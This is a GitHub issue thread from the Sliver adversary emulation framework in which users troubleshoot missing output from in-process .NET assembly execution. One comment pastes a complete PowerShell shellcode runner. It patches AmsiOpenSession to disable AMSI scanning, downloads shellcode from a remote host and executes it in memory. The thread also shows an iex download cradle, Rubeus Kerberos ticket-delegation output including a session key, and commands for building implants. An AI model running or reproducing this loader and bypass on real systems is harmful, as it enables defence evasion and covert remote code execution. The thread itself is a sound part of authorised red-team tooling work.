BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0
8.54k stars 1.13k forks

In-process .NET assembly execution does not always return output #1067

Open senzee1984 opened 1 year ago

senzee1984 commented 1 year ago

Describe the bug If the execution happens in the process, there is no output.

To Reproduce Steps to reproduce the behavior:

  1. Generate a session stager implant, and execute it.
  2. Select the session, and execute any .NET exe with option -i
  3. Observe that there is no output

Expected behavior I am not sure if it is an intended behavior for in-process execution. @MrAle98 mentioned that if --debug is enabled when generating an implant, we can see the output. Since I generated a stager implant, there is no debug option.

Screenshots

[server] sliver (WELL-KNOWN_UNION) > execute-assembly /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (WELL-KNOWN_UNION) > execute-assembly -i /opt/red/rubeus.exe hash /password:123

[*] Output:

Additional context The session is obtained from a stager session implant.

senzee1984 commented 1 year ago

A reference: https://github.com/sliverarmory/armory/issues/27#issuecomment-1376409950

moloch-- commented 1 year ago

@rkervella is this something weird to do with the stdout shenanigans?

rkervella commented 1 year ago

Yeah I believe it's an issue with go-clr, I'll have a look.

rkervella commented 1 year ago

@ziyishen97 have you tried with the --amsi-bypass and/or --etw-bypass flags?

rkervella commented 1 year ago

Removing the bug tag since I'm unable to reproduce on both Windows 11 and Windows 2019.

senzee1984 commented 1 year ago

The same result

sliver (STRAIGHT_WILLOW) > execute-assembly  -i -M -E /opt/red/rubeus.exe hash /password:123

[*] Output:

senzee1984 commented 1 year ago

Additional information: I cannot get any output from the Sliver CLI; however, the output is displayed in the host process, such as the PowerShell CLI. I used a PowerShell download cradle to get a session; when I execute a .NET assembly, the output is displayed in the PowerShell CLI.

PS C:\Windows\system32> iex(new-object net.webclient).downloadstring('http://192.168.0.44:8080/stager.txt')
True
Downloading sliver.bin

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!
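
The behaviour described in this comment (in-process output appearing in the PowerShell window instead of in the Sliver console), as an added illustration that is not part of the issue and is not Sliver or go-clr code: a .NET assembly's Console.WriteLine goes to whatever Console.Out the hosting process holds at the moment Main is invoked, so a loader that wants the text back has to swap Console.Out (or the underlying stdout handle) before the call and restore it afterwards. The Demo class and its Main are constructed for the example.

```powershell
# Added example (not from the issue, not Sliver/go-clr code). Shows that
# Console output from an in-process .NET assembly lands on whatever
# Console.Out the hosting process has when the entry point is invoked.

# Tiny "assembly" constructed for the example, compiled in-process.
$src = @'
using System;
public static class Demo {
    public static int Main(string[] args) {
        Console.WriteLine("hello from in-process assembly, args=" + string.Join(",", args));
        return 0;
    }
}
'@
$demoType = Add-Type -TypeDefinition $src -Language CSharp -PassThru | Select-Object -First 1
$entry    = $demoType.GetMethod('Main')
$argv     = [string[]]@('a', 'b')

# 1. No redirection: the text goes straight to this console, which is
#    what the reporter saw in the PowerShell window hosting the implant.
$null = $entry.Invoke($null, @(,$argv))

# 2. Swap Console.Out for a StringWriter before invoking, restore it
#    afterwards, then read the captured text back.
$origOut  = [Console]::Out
$sw       = New-Object System.IO.StringWriter
[Console]::SetOut($sw)
try {
    $null = $entry.Invoke($null, @(,$argv))
} finally {
    [Console]::SetOut($origOut)
}
$captured = $sw.ToString()
"captured: $captured"
```

Run it in a Windows PowerShell session: the first Invoke prints to the console, the second is returned in $captured. [Console]::SetOut only intercepts managed Console writes; a tool that writes through the native STD_OUTPUT_HANDLE needs the handle itself redirected, and shellcode injected into another process (as with the download cradle above) inherits that process's standard handles.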

MrAle98 commented 1 year ago

@ziyishen97 Are you using the fork https://github.com/MrAle98/sliver/tree/feat/powershell? May I suggest that you first try the latest release of Sliver and check whether you still get the issue?

senzee1984 commented 1 year ago

@MrAle98 I am using the latest version, and manually modified a few files to include the powershell command.

All hackers gain exalted
[*] Server v1.5.33 - 79ff35429dd48d361a13c447342966292210ab4f - Dirty
[*] Welcome to the sliver shell, please type 'help' for options
MrAle98 commented 1 year ago

@ziyishen97 Do you keep getting the same issue also without your modifications? Do you have the same issue with beacon type implants?

senzee1984 commented 1 year ago

I tried with the latest binary release; it does not have the issue. Thanks for your suggestion. @MrAle98 @rkervella

MrAle98 commented 1 year ago

@ziyishen97 among your modifications is there anything that modifies the implant?

senzee1984 commented 1 year ago

@MrAle98 I made modifications based on the comparison https://github.com/BishopFox/sliver/compare/master...MrAle98:sliver:feat/powershell

MrAle98 commented 1 year ago

@ziyishen97 In the branch you took there are no modifications on the implant side. It is weird that after adding the modifications you can't retrieve the output...

senzee1984 commented 1 year ago

Okay, I find there is an inconsistency between sessions. I am using the official latest version. The SYSTEM session has output, while other users' sessions (including local admin) do not. @MrAle98

[server] sliver (AGREEABLE_SPIRITUAL) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

[*] rto has joined the game

[*] rto has joined the game

[server] sliver (AGREEABLE_SPIRITUAL) > sessions

 ID         Transport   Remote Address       Hostname   Username              Operating System   Health  
========== =========== ==================== ========== ===================== ================== =========
 1e58be58   http(s)     192.168.0.61:61122   web01      CHILD\david           windows/amd64      [ALIVE] 
 21084a77   http(s)     192.168.0.61:61124   web01      NT AUTHORITY\SYSTEM   windows/amd64      [ALIVE] 
 cf73a9d6   http(s)     192.168.0.61:61123   web01      CHILD\eric            windows/amd64      [ALIVE] 
 a94ef7ea   http(s)     192.168.0.61:61189   web01      CHILD\eric            windows/amd64      [ALIVE] 

[server] sliver (AGREEABLE_SPIRITUAL) > use 21084a77-c18c-4bf6-8a7d-5addda81f83a

[*] Active session STRAIGHT_WILLOW (21084a77-c18c-4bf6-8a7d-5addda81f83a)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (STRAIGHT_WILLOW) > use cf73a9d6-2324-4eb5-8602-393091a2fe9c

[*] Active session STRAIGHT_WILLOW (cf73a9d6-2324-4eb5-8602-393091a2fe9c)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

senzee1984 commented 1 year ago

@rkervella @moloch-- Hope you are doing well! Here is an update: I compiled the latest source code without any modification, and the issue still exists. The following session was obtained by executing a PowerShell shellcode runner.

[server] sliver (ILL_FURNACE) > execute-assembly /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      [base64 ticket omitted]

[server] sliver (ILL_FURNACE) > execute-assembly --i /opt/red/rubeus.exe tgtdeleg /nowrap
error: invalid flag: --i
[server] sliver (ILL_FURNACE) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

The contents of the PowerShell shellcode runner:

function LookupFunc {
    # Resolve an exported function address without declaring P/Invoke
    # signatures: reuse the GetModuleHandle/GetProcAddress wrappers that
    # System.dll already carries in Microsoft.Win32.UnsafeNativeMethods.
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    ).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp = @()
    $assem.GetMethods() | ForEach-Object { If ($_.Name -eq "GetProcAddress") { $tmp += $_ } }
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {
    # Emit a delegate type at runtime so an unmanaged function pointer can be
    # called with the given parameter types and return type.
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
            [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

    $type.DefineConstructor('RTSpecialName, HideBySig, Public',
        [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')

    $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

# Overwrite the first three bytes of amsi!AmsiOpenSession with "xor rax, rax"
# (0x48 0x31 0xC0) so AMSI no longer scans what this process loads next.
# The page must be made writable first; VirtualProtect's $True result is the
# "True" line seen in the transcript above.
[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
$oldProtectionBuffer = 0
$vp = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)   # 0x40 = PAGE_EXECUTE_READWRITE
$buf = [Byte[]] (0x48, 0x31, 0xC0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)

# Fetch the Sliver stager shellcode, place it in RWX memory and run it on a
# new thread inside this powershell.exe; the implant therefore lives in the
# PowerShell process and shares its console and standard handles.
Write-Host 'Downloading sliver.bin'
[Byte[]] $buf = (New-Object Net.Webclient).DownloadData('http://192.168.0.44:8080/sliver.bin')
# VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40))
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $buf.length, 0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
# CreateThread(NULL, 0, shellcode, NULL, 0, NULL)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0, $lpMem, [IntPtr]::Zero, 0, [IntPtr]::Zero)
# WaitForSingleObject(hThread, INFINITE): keeps the host alive while the implant runs.
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)

However, it looks like only the stager implant has this issue; a stageless implant or a spawned session (getsystem) does not.


[server] sliver (ILL_FURNACE) > generate --http 192.168.0.44 -f exe --debug --save /opt/red/sliver.exe

[*] Generating new windows/amd64 implant binary
[*] Build completed in 15s
[*] Implant saved to /opt/red/sliver.exe

[*] Session d7040874 ABSOLUTE_ADULTHOOD - 192.168.0.61:49894 (web01) - windows/amd64 - Tue, 24 Jan 2023 18:32:36 PST

[server] sliver (ILL_FURNACE) > use d7040874-2ab9-4e04-b55a-3eaabc7c539f

[*] Active session ABSOLUTE_ADULTHOOD (d7040874-2ab9-4e04-b55a-3eaabc7c539f)

[server] sliver (ABSOLUTE_ADULTHOOD) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      [base64 ticket omitted]

gregohmyeggo commented 1 year ago

I am also seeing this issue on v1.5.31 for both beacons and sessions; staged and stageless.

[*] Server v1.5.31 - d699a8d1401f89fc235cb4bfc4cf58feee87308a - Dirty
[*] Welcome to the sliver shell, please type 'help' for options

Output DOES appear when the shellcode loader is a Console Application, but does NOT return in Sliver console.

rkervella commented 1 year ago

The go-clr library we're using has been updated, and might fix some of these issues. @senzee1984 @gregohmyeggo if you're feeling adventurous, you can try to compile from the master branch and test it out.

Selora commented 11 months ago

Getting the same behavior on v1.5.41

With a freshly compiled Seatbelt, --in-process does not yield any output, while without this option it behaves as intended. Apologies for the lack of troubleshooting done on my end; just putting this here for tracking.

The implant process is a .NET 6.0 console app, tried in an interactive session.

EDIT:

Tested another implant, .NET 7.0, single-file self-contained published assembly, and I got the output back on both session and beacon.